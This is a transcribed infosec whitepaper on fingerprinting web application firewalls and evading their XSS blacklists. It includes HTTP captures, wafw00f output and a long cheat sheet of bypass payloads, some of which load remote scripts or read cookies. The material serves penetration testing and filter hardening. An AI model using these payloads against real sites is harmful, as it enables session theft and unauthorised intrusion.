R h a i n f o s e c. c o m Page 1
|
|
|
- Eugene West
- 10 years ago
- Views:
Transcription
1 R h a i n f o s e c. c o m Page 1
2 Table of Contents 1.1 FUNDAMENTAL CONCEPT INTRODUCTION Fingerprinting a WAF Cookie Values FingerPrinting Citrix Netscaler Fingerprinting F5 BIG IP ASM HTTP Response Fingerprinting Mod_Security Fingerprinting WebKnight Fingerprinting F5 BIG IP Fingerprinting dotdefender Automatic Fingerprinting With Wafw00f Cookie Based Detection Matching HTTP Response List of WAF s Tool in Action Bypassing Blacklists Brute Forcing Reg-ex Reversing Browser Bugs Approach for Bypassing Blacklists The Cheat Sheet Initial Tests Testing For Other Tags Entity Decoding Encoding Context Based Filtering Browser Bugs Charset Bugs Null Bytes Parsing Bugs R h a i n f o s e c. c o m Page 2
3 5.1.5 Unicode Separators Missing X-frame Options Docmodes Window.name Trick DOM Based XSS Bypasses ModSecurity s Bypass WEB KNIGHT BYPASS F5 BIG IP ASM and Palo ALTO Bypass Dot Defender Bypass Conclusion References R h a i n f o s e c. c o m Page 3
4 Acknowledgement I am very lucky to have great mentors who have always been helping me whenever I get stuck. First of all, I am really thankful to my mentor "David Vieira-Kurz of MajorSecurity GmbH for his tremendous help and this paper would have not been completed without his help and support. I am thankful to Sir Mario heiderichof cure53 for his great help and ideas and motivating me to write this paper by myself. I am thankful to Ashar Javed for his ideas with the cheat sheet. I am also grateful to a great friend of mine Alex Infuhr of cure53 for his help and support. Rafael Souza and Preston Hackett for proof reading and organizing the material, Giuseppe Ohpe from elearnsecurity, Prakhar Prasad from securitypulse, Nishant das Patnaik, Deepankar Arora, Sikandar Ali and last but not least M.Gazzaly for his help with designing. ABSTRACT It is known that over the years, a trend that addresses the information security landscape has emerged, I mean, web applications are under attack, given this perspective, Web Application Firewalls are becoming increasingly popular, which are most commonly used by organizations to protect against various attacks such as SQL Injection, XSS, Remote command execution etc. Web applications continue to be a primary attack vector for cyber-crimes, and the charts show no sign of abating. Attackers are increasingly using network attacks via cross-site scripting, SQL injection, and many other infiltration techniques aimed at the application layer. Vulnerabilities in web applications are a target and can be attributed to many problems and damage to a company, means include, poor input validation, session management, insecure, system settings configured incorrectly and flaws in operating systems and server software web. It is noteworthy that humans err by nature; in fact, writing secure code is the most effective method to minimize vulnerabilities in web applications! However, we are subject to error while developing, writing secure code is much easier said than done and involves several key issues. 1.1 FUNDAMENTAL CONCEPT The attack Cross-site scripting (XSS) consists of a vulnerability caused by the failure in the validation of the input parameters from the user and the server response in the web application. This attack allows HTML code to be inserted arbitrarily in the target user's browser. Technically, this problem occurs when an input parameter of the user is fully displayed by the browser, as in the case of a JavaScript code shall be construed as part of legitimate application and with access to all entities in the document (DOM). In practice, the responsibility for the attack run statements in the victim's browser using a web application vulnerable structures modify the HTML document and even using the blow to perpetrate frauds like phishing. An XSS attack is one that allows the injection of scripts wholesale site, usually via some input field. R h a i n f o s e c. c o m Page 4
5 1.2 INTRODUCTION Firewalls, IDS and IPS are the most common security mechanisms that are often used to protect infrastructure from malicious attackers. Out of these, firewalls are the most commonly used, they are placed at the network layer and analyzes malicious packets as well as application layer, where their purpose is to monitor all HTTP and HTTPS traffic between clients and servers and based upon the preconfigured registered signatures in a data base. In general, the basic goal of an application layer firewall based network is to monitor and block user content that violates the pre-defined policy, in some cases these policies are patterns of user input, which can potentially end up in an attack. The main Insight to pass through a WAF is the order of semantically equivalent to an XSS attack craft, avoiding security policies. WAF s rely upon two of most common approaches, the whitelist and the blacklist, Whitelist means that the WAF only allow stuff that is present inside its database as a whitelist, whereas the blacklist attempts to filter out what should not be allowed. The most common approach is the use of blacklisting approach, which means that they ll filter out Known Bad, however blacklisting is the wrong approach and almost every filter based upon blacklists can be bypassed. This paper aims at explaining various methodologies that can be used for bypassing WAF s that particularly rely upon blacklist. 2.1 Fingerprinting a WAF In this section, we will learn how various techniques that can be used to fingerprint some Web application firewalls. As reconnaissance is the first step towards hacking, it s very essential to know that what we are up against before we start bypassing them. Several WAF s leave signs of evidence inside the cookie values, http response etc which makes it very easy to detect what WAF we are up against Cookie Values Several WAF s would add up their unique cookie inside the HTTP communication. This can be very helpful from an attacker s perspective FingerPrinting Citrix Netscaler R h a i n f o s e c. c o m Page 5
6 One of the examples of such WAF is Citrix Netscaler. A simple non malicious GET request was performed to an application running Citrix Netscaler. GET / HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/ Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ASPSESSIONIDAQQSDCSC=HGJHINLDNMNFHABGPPBNGFKC; ns_af=31+lrs3eeeobbxbv7awdfiehrn8a000;ns_af_.target.br_%2f_wat=qvnqu0vtu0lp TklEQVFRU0RDU0Nf?6IgJizHRbTRNuNoOpbBOiKRET2gA& Connection: keep-alive Cache-Control: max-age=0 The highlighted part is red (ns_af) are the cookies that netscaler has added as a part of the GET request, this reveals that the application is behind a citrixnetscaler Fingerprinting F5 BIG IP ASM F5 is one of the world renowned Web application firewall s with deep inspection capabilities, similar to citrixnetscaler F5 BiG IP ASM also adds certain cookies as a part of their HTTP communication. The following demonstrates a non-malicious GET request that was submitted to an application running behind an F5 BIG IP ASM firewall. GET / HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/ Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: target_cem_tl=40fc2190d3b2d4e60ab22c0f9ef155d5; s_fid=77f8544da30373ac- 31AE8C79E13D7394; s_vnum= %26vn%3d1; s_nr= new; s_nr2= new; s_lv= ; s_vi=[cs]v1 294DCEC0051D E003E9DC[CE]; fe_typo_user=7a64cc46ca253f f9b9b79eb66; TSe3b54b=36f2896d9de8a61cf27aea24f35f8ee1abd1a43de557a25c529fe828; TS65374d=041365b3e678cba0e c26abd1a43de557a25c529fe8285a5ab5a8e5d0f299 Connection: keep-alive Cache-Control: max-age=0 R h a i n f o s e c. c o m Page 6
7 2.1.4 HTTP Response Other WAF s may be detected by the type of http response we receive when submitting a malicious request, responses may vary depending upon a WAF to a WAF. Some of the common responses are 403, 406, 419, 500, 501 etc Fingerprinting Mod_Security Mod_security is an open source WAF specifically designed for Apache server, due to it being opensource it has been bypassed many times and hence the detection rules have been significantly improved. A malicious request sent to an application running behind mod_security returns a 406 Not acceptable error along with it inside the response body it also reveals that the error was generated by mod_security. Request GET /<script>alert(1);</script>http/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/ Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Response HTTP/ Not Acceptable Date: Thu, 05 Dec :33:03 GMT Server: Apache Content-Length: 226 Keep-Alive: timeout=10, max=30 Connection: Keep-Alive Content-Type: text/html; charset=iso <head><title>not Acceptable!</title></head><body><h1>Not Acceptable!</h1><p>An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</p></body></html> R h a i n f o s e c. c o m Page 7
8 2.1.5 Fingerprinting WebKnight Webknight is another very popular Web application firewall, it was specifically designed for IIS servers. The WAF works upon a blacklist and looks for common patterns for attacks such as SQL injection, Directory Traversal, XSS etc. Unlike, other WAF s webknight is very easy to fingerprint a malicious request returns a 999 No Hacking response. Request GET /?PageID=99<script>alert(1);</script>HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/ Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Response HTTP/ No Hacking Server: WWW Server/1.1 Date: Thu, 05 Dec :14:23 GMT Content-Type: text/html; charset=windows-1252 Content-Length: 1160 Pragma: no-cache Cache-control: no-cache Expires: Thu, 05 Dec :14:23 GMT R h a i n f o s e c. c o m Page 8
9 2.1.6 Fingerprinting F5 BIG IP A malicious request sent to F5 BIG IP returns a response of 419 Unknown, this could also be used to fingerprint F5, if in case the cookie values have hidden from the request. Response GET /<script> HTTP/1.0 HTTP/ Unknown Cache-Control: no-cache Content-Type: text/html; charset=iso Pragma: no-cache Content-Length: 8140 Date: Mon, 25 Nov :22:44 GMT Connection: keep-alive Vary: Accept-Encoding Fingerprinting dotdefender dotdefender is another well-known WAF that was specifically designed for protecting.net applications against well known attacks. Similar to Mod_security and WebknightdotDefender also reveals itself inside the response body when a malicious request is sent to a webapplication running dotdefender. Request GET /---HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/ Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 R h a i n f o s e c. c o m Page 9
10 Response HTTP/ OK Cache-Control: no-cache Content-Type: text/html Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Thu, 05 Dec :40:14 GMT Content-Length: 2616 <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" " <html xmlns=" <head> <title>dotdefender Blocked Your Request</title> R h a i n f o s e c. c o m Page 10
11 2.2.1 Automatic Fingerprinting With Wafw00f Some WAF s are smart enough that they will hide their identity from cookie values as well as the http response, this means that even if you send a malicious request the response would always be 200 OK, in such cases we need to perform additional tests to identify fingerprint such WAF s. Fortunately, to save our time we can use a very commonly used tool called Wafw00f. Wafw00f is a small tool written in python and is specifically used tool for fingerprinting Web application firewalls, it conducts five different tests to detect the WAF, such as keeping track of the cookies inside the http request, by analyzing http response received from sending malicious requests, by using drop packets such as FIN and RST and looking at the response received, by server cloaking i.e. modifying URL and altering methods and by testing for pre-built negative signatures which vary from a WAF to a WAF. Let s take a look at some of the detection methods that Wafw00f use directly from its source code. The following screenshot that demonstrates a few of the attack vectors that are send as a part of an http request, it contains a commonly used XSS string, an attempt to traverse the /etc/passwd file and a clean HTML string. These are the most commonly used patterns that any WAF would block in the first place, therefore the idea behind sending this is to cause the WAF to trigger a unique error which can help wafw00f identify if an application is running behind a WAF Cookie Based Detection The most common type of detection that wafw00f uses is the cookie based detection, The screenshot below demonstrates the use of regular expressions (Used for Pattern Matching) to match pattern for a certain cookies, which in this case is F5asm and F5trafficsheild. Notice that the F5 traffic shield also returns a F5-TrafficSheild inside its server header and this is what the code is looking for. R h a i n f o s e c. c o m Page 11
12 2.2.3 Matching HTTP Response The second most common type of detection method is matching the http response, as we learned before that several WAF respond with their own unique http response code which helps us to identity the type of WAF being used. For example the code below is used to detect if the application is running behind a webknight firewall, it sends an attack vector and matches if the response code received is equal to 999, which we earlier discovered is thrown by Webknight WAF when a malicious request is received. defiswebknight(self): detected =False for attack inself.attacks: r = attack(self) if r isnone: Return response,responsebody= r ifresponse.status== 999: detected =True Break return detected List of WAF s The list parameter inside of wafw00f can be used to determine all the WAF s that wafw00f is currently capable of detecting. R h a i n f o s e c. c o m Page 12
13 Command./wafw00f.py list Output < ^ ^ ///7/ /.' \ / ////7/ /,' \,' \ / / V V // o // _/ V V // 0 // 0 // _/ _n_,'/_n_//_/ _n_,' \_,' \_,'/_/...' WAFW00F - Web Application Firewall Detection Tool By SandroGauci&&Wendel G. Henrique Can test for these WAFs: Profense NetContinuum Barracuda HyperGuard BinarySec Teros F5 Trafficshield F5 ASM Airlock Citrix NetScaler ModSecurity DenyALL dotdefender webapp.secure BIG-IP URLScan WebKnight SecureIIS Imperva R h a i n f o s e c. c o m Page 13
14 2.2.5 Tool in Action The tool is super easy to use, all you need to do is to execute the following command. Command./wafw00f.py < ^ ^ ///7/ /.' \ / ////7/ /,' \,' \ / / V V // o // _/ V V // 0 // 0 // _/ _n_,'/_n_//_/ _n_,' \_,' \_,'/_/...' WAFW00F - Web Application Firewall Detection Tool By SandroGauci&&Wendel G. Henrique Checking The site is behind a F5 ASM Number of requests: Bypassing Blacklists As we learned before that most of the WAF vendors to save up time would rely upon the negative model i.e. the blacklist, which means that they will have a database that will contain all of the signatures generally in the form of complex REG-EX that would look for the patterns that they are trying to block, the problem with this approach almost blacklist based protections can be bypassed due to the flexibility that JavaScript offers, depending upon the context, there are literally thousands of ways that we can create a valid JavaScript to bypass blacklist based protections. This is what we will talk about in this particular section. There are three different approaches to blacklist bypassing namely: 1) Brute Forcing 2) Reg-Ex Reversing 3) Browser Bugs R h a i n f o s e c. c o m Page 14
15 3.1.2 Brute Forcing In the brute forcing approach, we basically throw bunch of payloads and expect them to trigger. This is how most of the automated tools and scanners work. This approach may be good for some filters, however oftentimes in real world scenario s this approach would fail, because automated scanners do not understand the context and our attack payload varies from a context to a context Reg-ex Reversing This is the best approach for bypassing Web application firewalls, as mentioned before all the WAF s rely upon matching the attack payloads with the signatures in their databases, the signatures mostly are in form of complex regular expressions, if the attack payload matches the reg-ex the WAF triggers up, however if the attack payload doesn t matches the reg-ex the WAF doesn t trigger up. In this approach, we spend some time in reversing the signatures for the WAF and once we know that what exactly the WAF is blocking, we can craft an attack payload which would not trigger up any of the WAF alarms and as-well as yield valid javascript syntax Browser Bugs When all else fails, this is the last approach that we are left with is using the browser bugs, the key for bypassing any WAF is knowing/learning the browser better than the vendor. Often times when we are up against WAF with a great rule set, we are not able to bypass the blacklists inside the modern browsers, this is where we move to older browsers and look for bugs that have been already found or possibly look for a zero day. As we move forward we will look at couple of browser bugs and see how they can be used for bypassing WAF s R h a i n f o s e c. c o m Page 15
16 4.1 Approach for Bypassing Blacklists The Cheat Sheet In this section, we will take a look at the approach and methodology for bypassing blacklists, in this section I will talk about the methodology for brute forcing as well as reversing reg-ex Initial Tests 1) Try inserting harmless HTML payloads such as <b>, <i>, <u> to see if they are actually blocked and how they are rendered inside the http response. Are they HTML encoded, did the filter strip out the tags, did the filter strip out the opening/closing brackets?, did the filter replace open; closing brackets with some other entity. Take a note of the response. 2) In case if the filter is stripping out the opening and closing tags, try inserting an open tag without closing it (<b, <i, <u, <marquee) and take a note at the response. Did it filter out the open tag, or did it render perfectly. If it did render perfectly, this means that the reg-ex is looking for both anhtml element with both opening and closing tag and doesn t filter out opening tag. 3) Next, we will try with the most common XSS payloads that 99.99% percent of xss filters would be filtering out. <script>alert(1);</script> <script>prompt(1);</script> <script>confirm (1);</script> <script src=" What response did you receive, did it trigger a 403 forbidden page or probably internal error 500, and did it completely strip the whole statement from http response? Or did it strip some parts of it, are you left with alert, prompt, or confirm statements? If yes, are they filtering out the opening and closing parenthesis ()? Next, try injecting a combination of upper and lowercase, in case they might not be filtering out the upper/lowercases and would only be looking for lowercase <script> <script>alert(1);</script> 4) Assuming that the filter is looking for upper/lowercase, we can try using nested tags to attempt to bypass the XSS filter. <scr<script>ipt>alert(1)</scr<script>ipt> In case, where filter is stripping out the <script> and </script> tags, when they are stripped out the nested tags <scr and ipt> would concatenate and form a valid JavaScript and hence you d be able to bypass the restrictions. 5) Next, we will try injecting the <a href tag and take a note of the response: R h a i n f o s e c. c o m Page 16
17 <a href= Was the <a tag stripped out? Was the href stripped out? Or the most common case, was data inside the href element filtered out? Assuming that, none of the tags were filtered out, we would try inserting a JavaScript statement inside the href tag. <a href= javascript:alert(1) >Clickme</a> Did it trigger an error? Did it strip the whole JavaScript statement inside the href tag? Or did it only strip the javascript? Try mixing upper case with lower case and see if this passes by. In case where JavaScript keyword is filtered and we are inside the href tag, there are lots of different types of encodings that we can use, however more on this later. Next, we would try an event handler to execute JavaScript. <a href="rhainfosec.com" onmouseover=alert(1)>clickhere</a> Was the event handler stripped out? Or did it only strip the mouseover part after on. Next, try inserting an invalid event handler to check if they are filtering out all the event handlers or some of it. <a href="rhainfosec.com" onclimbatree=alert(1)>clickhere</a> Did you receive the same response? Or were you able to inject it? In case, where we were able to inject an invalid event handler with and it did not filter out on part of the event handler, this means that they are filtering out certain event handlers. With HTML5 we have more than 150 event handlers and this means that 150+ ways of executing JavaScript and there is a significant change that they are not filtering out the event handler. One of the less commonly filtered out event handler is the onhashchange. <body/onhashchange=alert(1)><a href=#>clickit Testing For Other Tags Next, we would try with other commonly used tags and attributes that could be used to yield a validjavascript syntax. R h a i n f o s e c. c o m Page 17
18 Testing With Src Attribute Next, we would test for if the src attribute is being filtered or not, there are wide varieties of html tags that use src attribute to execute javascript. <img src=x onerror=prompt(1);> <img/src=aaa.jpg onerror=prompt(1);> <video src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);> Testing With Iframe <iframesrc="javascript:alert(2)"> <iframe/src="data:text/html;&tab;base64&newline;,pgjvzhkgb25sb2fkpwfszxj0kdeppg= ="> Testing with embed tag <embed/src=//goo.gl/nlx0p> Testing With action Attribute Action being another attribute that can be used to execute javascript, it is commonly used by elements such as <form, <isindex etc. <form action="javascript:alert(1)"><input type=submit> <isindex action="javascript:alert(1)" type=image> <isindex action=j&tab;a&tab;vas&tab;c&tab;r&tab;ipt:alert(1) type=image> <isindex action=data:text/html, type=image> Variation by.mario <formaction='data:text/html,<script>alert(1)</script>'><button>click Testing With formaction Attribute <isindexformaction="javascript:alert(1)" type=image> <input type="image" formaction=javascript:alert(0)> <form><button formaction=javascript:alert(1)>clickme Testing With background Attribute <table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6 R h a i n f o s e c. c o m Page 18
19 Testing With posters Attribute <video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5 Testing with data Attribute <object data="data:text/html;base64,phnjcmlwdd5hbgvydcgisgvsbg8ikts8l3njcmlwdd4="> <object/data=//goo.gl/nlx0p? Testing with code Attribute <applet code="javascript:confirm(document.cookie);"> // Firefox Only <embed code=" allowscriptaccess=always> Event Handlers <svg/onload=prompt(1);> <marquee/onstart=confirm(2)>/ <body onload=prompt(1);> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)"> Shortest Vector <q/oncut=open()> <q/oncut=alert(1)> // Useful in-case of payload restrictions. Nested Trick <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)> <body language=vbsonload=alert-1 // Works with IE8 <command onmouseover ="\x6a\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6f\x6c\x6f\x6e\x3b\x63\x6f\x6e\x6 6\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8 Using Throw When Parenthesis are Blocked This technique was discovered by gareth heyes, this is useful in scenario where parenthesis are being stripped out. <a onmouseover="javascript:window.onerror=alert;throw 1> R h a i n f o s e c. c o m Page 19
20 Here is another variation of it. <img src=x onerror="javascript:window.onerror=alert;throw 1"> Chrome and Internet explorer, the above vectors would throw up an uncaught error, however this could also be mitigated by using the little bit of hex magic. <body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29'; Expression Attributes <img style="xss:expression(alert(0))"> // Works upto IE7. <div style="color:rgb(''�x:expression(alert(1))"></div> // Works upto IE7. <style>#test{x:expression(alert(/xss/))}</style> // Works upto IE7 Testing With location Attribute <a onmouseover=location= javascript:alert(1)>click <body onfocus="location='javascrpt:alert(1) >123 Other Miscellaneous Payloads <meta http-equiv="refresh" content="0;url=//goo.gl/nlx0p"> <meta http-equiv="refresh" content="0;javascript:alert(1)"/> <svg xmlns=" onload="javascript:\u0061lert(1);"></g></svg> // <svg xmlns:xlink=" r=100 /><animate attributename="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> // By Mario <svg><![cdata[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg> // <meta content="&newline; 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/> <math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed XSS Payload when= ( ) ; : are not allowed: <svg><script>alert(/1/)</script> // Works With All Browsers ( is html encoded to ( ) is html encoded to ) Variations in Opera <svg><script>alert( 1) // Works with Opera Only R h a i n f o s e c. c o m Page 20
21 4.1.3 Entity Decoding It s often very common that web application firewalls would decode inputs, you should test if the WAF you are up against is decoding some entities. The examples below are not valid standalone valid XSS vectors, however in case where the WAF would decode the entities it would form a perfect JavaScript syntax and hence you d be able to bypass it. Examples </script><script>alert(1)</script> <a href="j&#x41;vascript:alert% %2529">hello</a> Encoding JavaScript is a very flexible language, we have flexibility to perform several types of encodings such as Hex, Unicode, and HTML etc. However there are certain rules on what part of the payload to encode. In case where a WAF is decoding certain entities that s a different story, however here is the list of the certain attributes followed by the well-known encodings they support. Attributes: href= action= formaction= location= on*= name= background= poster= src= code= Supported Encodings: HTML, Octal, Decimal, Hexadecimal, and Unicode Attribute: data= Supported Encodings: base64 Examples of encoding these attributes can be found inside the cheat sheet. R h a i n f o s e c. c o m Page 21
22 4.1.5 Context Based Filtering A very big problem with Web application filters is that they don t understand the context, in a case where the blacklist is blocking all the standalone JavaScript, it s still not sufficient for protecting against XSS. The reason being is that not every time we need a standalone vector to execute JavaScript, often times our input is reflected in such a manner that we don t need standalone JavaScript to execute a valid JavaScript statement. Let s take a look at few examples: Input Reflected an Attribute Take the following scenario as an example, where your input is being reflected inside the value attribute: <input value="xsstest" type=text> It s obvious that we can use something like ><imgsrc=x onerror=prompt(0);>, Where we used > to close the input tag and then insert our payload. However, in a case where we have the characters <> being escaped or stripped out of the input, we can use something similar to bypass it and execute JavaScript. autofocusonfocus=alert(1)// So, basically we used the and the beginning to escape out of the value tag and then executing our event handler. " onmouseover="prompt(0) x=" " onfocusin=alert(1) autofocus x=" " onfocusout=alert(1) autofocus x=" " onblur=alert(1) autofocus a=" Input Reflected Inside of <script> tags Consider the following scenario, where your input is reflected inside the <script> tags inside the following manner: <script> Var x= Input ; </script> We are up against a filter that is not allowing opening and closing brackets (<>) therefore, we cannot close an existing attribute by something like ></script>, however in this case, we really don t need to close the script attribute to execute JavaScript, since our input is already reflected inside the script tag, we can directly call the alert(), prompt() confirm() functions and execute valid JavaScript. The following input would trigger up an alert. R h a i n f o s e c. c o m Page 22
23 ;alert(1)// The double quote and the semicolon would close up the existing attribute and the alert function would execute. Here is how it would look: <script> Var x= ;alert(1)// ; </script> Unconventional Event Listeners Often times can try using unconventional event handlers inside of JavaScript such as DOMfocusin, DOMfocusout, these events require event listeners for properly executing. Example ";document.body.addeventlistener("domactivate",alert(1))// ";document.body.addeventlistener("domactivate",prompt(1))// ";document.body.addeventlistener("domactivate",confirm(1))// Here is the list of some of event handlers of same category, Kudos for the list: DOMAttrModified DOMCharacterDataModified DOMFocusIn DOMFocusOut DOMMouseScroll DOMNodeInserted DOMNodeInsertedIntoDocument DOMNodeRemoved DOMNodeRemovedFromDocument DOMSubtreeModified HREF Context Another context that you would encounter very frequently is when the input is inside the href tag: Example <a href= Userinput >Click</a> In that case, all we need to do is to directly insert the JavaScript, when the user clicks it the JavaScript executes. R h a i n f o s e c. c o m Page 23
24 Example: javascript:alert(1)// Here is how it s reflected back: <a href= javascript:alert(1)// >Click</a> Variations It would be very common that almost every blacklist filter you d encounter would strip out the JavaScript keyword or look for JavaScript followed by a colon. In that case you can use HTML entities and URL encoding to bypass the blacklists, the href tag would automatically decode the entities. If all fails, you can also try using vbscript which works up to IE 10 or data URI. JavaScript Variations The following variations should be tested: javascript:alert(1) javascript:alert(1) JaVaScRipT:alert(1) javas&tab;cript:\u0061lert(1); javascript:\u0061lert(1) javascript:alert(document.cookie) // AsharJaved Vbscript Variations: As mentioned above, Internet supports up to 10 supports vbscript, so we can use it to our advantage: vbscript:alert(1); vbscript:alert(1); vbscr&tab;ipt:alert(1)" Data URl data:text/html;base64,phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg== JSON Context In a context, where your input is being reflected inside the encodeuricomponent, it s very simple to trigger an XSS by simply inserting the JavaScript directly and it would execute in all modern browsers. Input Reflected encodeuricomponent('userinput') Example: -alert(1)- R h a i n f o s e c. c o m Page 24
25 -prompt(1)- -confirm(1)- Here is how your input would look like when reflected: encodeuricomponent(''-alert(1)-'') encodeuricomponent(''-prompt(1)-'') The above statements are perfectly valid javascript statements. Input Reflected Inside Of SVG The user input inside SVG behaves differently, with the advent of HTML 5 there has been a dramatic increase in use of SVG, with that being in use it introduces lots of problems, consider the following scenario, where your input is reflected inside <script> tags and script tags are inside <svg> <svg><script>varmyvar= YourInput ;</script></svg> So, when we submit the following input: ;alert(1)// In cases where it is encoding character, it d still form a valid JavaScript syntax and execute: <svg><script>varmyvar="text";alert(1)//";</script></svg> The reason why it executes is because it introduces an additional context (XML) into HTML context. A solution would be to double encode instead of a single encode of characters. R h a i n f o s e c. c o m Page 25
26 5.1 Browser Bugs As mentioned earlier, the key for bypassing web application filters is to know browser better than the vendor, the goal with all the browser bugs is to use a browser s features to our advantage and this is only possible with a firm understanding of how browsers work. In this section we will talk about few of the browser bugs Charset Bugs Charset bugs have been very common with IE too, the first charset bug was with UTF-7, and however we are not going to talk about it since it only works on old browsers, but I will discuss a more interesting scenario, where we are able to execute JavaScript in modern browsers. Charset defines encoding on a page, most of the websites on the internet use utf-8, however other charsets have been created to facilitate the use of other characters. In case where you are able to change the charset of the page to the encoding of your choice by tampering the parameters we can bypass 99.99% of WAF s and other protections such as HTML special characters, however this scenario occurs very rarely. Consider the following scenario, where the following application is using HTML special characters or you are up against a WAF that is encoding your input, the charset parameter defines the encoding of the page which is set to UTF-8 by default We will try to inject our sample payload and take a look at the results: ><img src=x onerror=prompt(0);> Since, we have a parameter that is able to set the charset, we will try changing it to UTF-32 and try injecting a UTF-32 based payload: 㸀 㰀 script 㸀 alert(1) 㰀 /script 㸀 So, when we will inject the above payload, it will be encoded to the UTF-32 encoding that we set, and then as the output encoding of the page is utf-8, it will be rendered as: "<script>alert (1) </ script> R h a i n f o s e c. c o m Page 26
27 The final POC would look like as follows: 32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80 The above payload would execute JavaScript inside of Internet explorer 9 or below, the reason why it would execute inside of IE9, because not only IE does not recognize the UTF-32 charset and so as Firefox, but also IE up till 9 consumes null bytes [0x00], whereas Chrome and Safari does recognize the utf-32 charset Null Bytes If you have some programming background you d be familiar with the concept of null bytes, they are commonly used as string terminator, Internet explorer up to 9 ignores null bytes everywhere, and this can help us evade many web application filters in case they are not filtering out the null bytes. I used null bytes trick to bypass mod_security s XSS filter few months back. Here are few examples: Examples <scri%00pt>alert(1);</scri%00pt> <scri\x00pt>alert(1);</scri%00pt> <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t> Note: Nullbytes only work upto php Parsing Bugs The RFC states that NodeNames cannot be a whitespace, this means that the following would examples would not work or render JavaScript. <script>alert(1);</script> <%0ascript>alert(1);</script> <%0bscript>alert(1);</script> So, let s assume that a filter where it s looking for a character (a-z) at the start of the nodename and is stripping it out. But in case where we can inject things the other special characters such as %, //,! etc., we can bypass the filter inside old versions of internet explorer, the reason being is that in older IE s payloads such as <%, <//, <!,<? Would get parsed as < and therefore we can inject our payload just after these characters. Here are few examples: Examples <// style=x:expression\28write(1)\29> // Works upto IE7 R h a i n f o s e c. c o m Page 27
28 Reference: <!--[if]><script>alert(1)</script --> // Works upto IE9 Reference: <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> // Works in IE7 Reference: <%div%20style=xss:expression(prompt(1))> // Works Upto IE Unicode Separators In Unicode charsets, we have separators which are parsed as space characters, every browser has its own set of separators. When you are up against WAF s with good rule set, they d often block all the event handlers, the regular expression for blocking all event handlers would look something as follows: [on\w+\s*] The above regular expression would look for everything start with on* and strip/filter it out. The problem with the \s meta-character is that it does not contains certain separators, x0b being an example. To determine valid separators for each browser, we can attempt to fuzz from range of 0x00 to 0xff and fuzz each browser to obtain valid separators; luckily for us Masato Kinugawa has already compiled a list of valid separators for each browser. IExplorer= [0x09,0x0B,0x0C,0x20,0x3B] Chrome = [0x09,0x20,0x28,0x2C,0x3B] Safari = [0x2C,0x3B] FireFox= [0x09,0x20,0x28,0x2C,0x3B] Opera = [0x09,0x20,0x2C,0x3B] Android = [0x09,0x20,0x28,0x2C,0x3B] Out of all the separators the x0b is a nasty one, Mod_security had applied a similar kind of reg-ex as described above, I used the following POC to bypass the mod_security the second time. <a/onmouseover[\x0b]=location='\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B'>rhainfosec R h a i n f o s e c. c o m Page 28
29 The following python snippet would print all the characters from the range of 0x00 to 0xff: count = 0 fori in xrange(0x00,0xff): count += 0x1 printchr(i), print count Missing X-frame Options It s often misunderstood that x-frame options are used for protecting against Clickjacking vulnerabilities, however preventing the websites from being framed could save you from countless XSS vulnerabilities too. Let s talk about few of the scenarios where missing x-frameoptions can cause problems Docmodes Internet Explorer introduced doc-modes a long time ago, the functionality of doc-modes were to provide backward compatibility to older browsers, however this poses a significant risk, in case where an attacker is able to frame your website, he may be able to introduce doc-mode and would be able to execute CSS expressions likes as follows: expression(open(alert(1))) The following POC would insert IE7 emulator and render the website into an iframe: POC <html> <body> <meta http-equiv="x-ua-compatible" content="ie=emulateie7" /> <iframesrc=" </body> </html> R h a i n f o s e c. c o m Page 29
